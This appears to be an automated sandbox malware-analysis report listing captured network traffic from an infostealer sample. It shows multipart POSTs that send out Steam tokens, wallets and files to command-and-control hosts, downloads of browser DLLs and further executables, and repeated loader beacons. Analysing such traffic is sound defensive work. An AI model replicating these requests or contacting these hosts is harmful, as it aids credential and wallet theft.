                                Source: global trafficHTTP traffic detected: POST /570d5d5e8678366c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGCBAFCFIJJJECBGIIJKHost: 85.28.47.70Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 43 42 41 46 43 46 49 4a 4a 4a 45 43 42 47 49 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 32 65 61 36 36 30 39 30 34 37 31 61 39 63 33 66 32 33 37 61 35 33 36 34 61 64 61 30 61 63 35 37 39 65 63 61 33 66 65 34 66 37 31 64 34 65 38 34 30 66 38 37 66 34 31 63 38 31 31 38 33 38 33 65 62 63 39 66 32 30 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 41 46 43 46 49 4a 4a 4a 45 43 42 47 49 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 41 46 43 46 49 4a 4a 4a 45 43 42 47 49 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 41 46 43 46 49 4a 4a 4a 45 43 42 47 49 49 4a 4b 2d 2d 0d 0a Data Ascii: ------EGCBAFCFIJJJECBGIIJKContent-Disposition: form-data; name="token"622ea66090471a9c3f237a5364ada0ac579eca3fe4f71d4e840f87f41c8118383ebc9f20------EGCBAFCFIJJJECBGIIJKContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------EGCBAFCFIJJJECBGIIJKContent-Disposition: form-data; name="file"------EGCBAFCFIJJJECBGIIJK--
                                Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 32 31 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000210001&unit=246122658369
                                Source: global trafficHTTP traffic detected: GET /down/1qWbf4Bsej2u.exe HTTP/1.1Host: 43.153.49.49:8888
                                Source: global trafficHTTP traffic detected: POST /570d5d5e8678366c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIDAAFIEHIEHJKFHCAEHost: 85.28.47.70Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 32 65 61 36 36 30 39 30 34 37 31 61 39 63 33 66 32 33 37 61 35 33 36 34 61 64 61 30 61 63 35 37 39 65 63 61 33 66 65 34 66 37 31 64 34 65 38 34 30 66 38 37 66 34 31 63 38 31 31 38 33 38 33 65 62 63 39 66 32 30 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 2d 2d 0d 0a Data Ascii: ------EGIDAAFIEHIEHJKFHCAEContent-Disposition: form-data; name="token"622ea66090471a9c3f237a5364ada0ac579eca3fe4f71d4e840f87f41c8118383ebc9f20------EGIDAAFIEHIEHJKFHCAEContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------EGIDAAFIEHIEHJKFHCAEContent-Disposition: form-data; name="file"------EGIDAAFIEHIEHJKFHCAE--
                                Source: global trafficHTTP traffic detected: GET /663cea891445d733/freebl3.dll HTTP/1.1Host: 85.28.47.70Cache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /663cea891445d733/mozglue.dll HTTP/1.1Host: 85.28.47.70Cache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /663cea891445d733/msvcp140.dll HTTP/1.1Host: 85.28.47.70Cache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 31Cache-Control: no-cacheData Raw: 65 31 3d 31 30 30 30 32 31 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e1=1000219001&unit=246122658369
                                Source: global trafficHTTP traffic detected: GET /663cea891445d733/nss3.dll HTTP/1.1Host: 85.28.47.70Cache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /Freshbuild.exe HTTP/1.1Host: 185.172.128.116
                                Source: global trafficHTTP traffic detected: GET /663cea891445d733/softokn3.dll HTTP/1.1Host: 85.28.47.70Cache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /663cea891445d733/vcruntime140.dll HTTP/1.1Host: 85.28.47.70Cache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 32 32 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000226001&unit=246122658369
                                Source: global trafficHTTP traffic detected: GET /cdn-directory/see.exe HTTP/1.1Host: 185.216.214.217
                                Source: global trafficHTTP traffic detected: POST /570d5d5e8678366c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCFIIIJJKJKFHIDGDBAKHost: 85.28.47.70Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST /570d5d5e8678366c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAAFBAKECAEGCBFIEGDGHost: 85.28.47.70Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 32 65 61 36 36 30 39 30 34 37 31 61 39 63 33 66 32 33 37 61 35 33 36 34 61 64 61 30 61 63 35 37 39 65 63 61 33 66 65 34 66 37 31 64 34 65 38 34 30 66 38 37 66 34 31 63 38 31 31 38 33 38 33 65 62 63 39 66 32 30 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 2d 2d 0d 0a Data Ascii: ------DAAFBAKECAEGCBFIEGDGContent-Disposition: form-data; name="token"622ea66090471a9c3f237a5364ada0ac579eca3fe4f71d4e840f87f41c8118383ebc9f20------DAAFBAKECAEGCBFIEGDGContent-Disposition: form-data; name="message"wallets------DAAFBAKECAEGCBFIEGDG--
                                Source: global trafficHTTP traffic detected: POST /570d5d5e8678366c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFBFHDBKJEGHJJJKFIIJHost: 85.28.47.70Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 32 65 61 36 36 30 39 30 34 37 31 61 39 63 33 66 32 33 37 61 35 33 36 34 61 64 61 30 61 63 35 37 39 65 63 61 33 66 65 34 66 37 31 64 34 65 38 34 30 66 38 37 66 34 31 63 38 31 31 38 33 38 33 65 62 63 39 66 32 30 0d 0a 2d 2d 2d 2d 2d 2d 41 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 41 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 2d 2d 0d 0a Data Ascii: ------AFBFHDBKJEGHJJJKFIIJContent-Disposition: form-data; name="token"622ea66090471a9c3f237a5364ada0ac579eca3fe4f71d4e840f87f41c8118383ebc9f20------AFBFHDBKJEGHJJJKFIIJContent-Disposition: form-data; name="message"files------AFBFHDBKJEGHJJJKFIIJ--
                                Source: global trafficHTTP traffic detected: POST /570d5d5e8678366c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBGCAFIIECBFIDHIJKFBHost: 85.28.47.70Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 32 65 61 36 36 30 39 30 34 37 31 61 39 63 33 66 32 33 37 61 35 33 36 34 61 64 61 30 61 63 35 37 39 65 63 61 33 66 65 34 66 37 31 64 34 65 38 34 30 66 38 37 66 34 31 63 38 31 31 38 33 38 33 65 62 63 39 66 32 30 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 2d 2d 0d 0a Data Ascii: ------CBGCAFIIECBFIDHIJKFBContent-Disposition: form-data; name="token"622ea66090471a9c3f237a5364ada0ac579eca3fe4f71d4e840f87f41c8118383ebc9f20------CBGCAFIIECBFIDHIJKFBContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------CBGCAFIIECBFIDHIJKFBContent-Disposition: form-data; name="file"------CBGCAFIIECBFIDHIJKFB--
                                Source: global trafficHTTP traffic detected: POST /570d5d5e8678366c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFIIEHJDBKJKECBFHDGHHost: 85.28.47.70Content-Length: 114463Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /570d5d5e8678366c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFHJJJKKFHIDAAKFBFBFHost: 85.28.47.70Content-Length: 270Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 42 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 32 65 61 36 36 30 39 30 34 37 31 61 39 63 33 66 32 33 37 61 35 33 36 34 61 64 61 30 61 63 35 37 39 65 63 61 33 66 65 34 66 37 31 64 34 65 38 34 30 66 38 37 66 34 31 63 38 31 31 38 33 38 33 65 62 63 39 66 32 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 42 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 6a 62 64 74 61 69 6a 6f 76 67 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 42 46 42 46 2d 2d 0d 0a Data Ascii: ------KFHJJJKKFHIDAAKFBFBFContent-Disposition: form-data; name="token"622ea66090471a9c3f237a5364ada0ac579eca3fe4f71d4e840f87f41c8118383ebc9f20------KFHJJJKKFHIDAAKFBFBFContent-Disposition: form-data; name="message"jbdtaijovg------KFHJJJKKFHIDAAKFBFBF--
                                Source: global trafficHTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                Source: global trafficHTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 31Cache-Control: no-cacheData Raw: 65 30 3d 31 30 30 30 30 35 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1000055001&unit=246122658369
                                Source: global trafficHTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                Source: global trafficHTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                Source: global trafficHTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                Source: global trafficHTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                Source: global trafficHTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                Source: global trafficHTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                Source: global trafficHTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                Source: global trafficHTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                Source: global trafficHTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                Source: global trafficHTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                Source: global trafficHTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
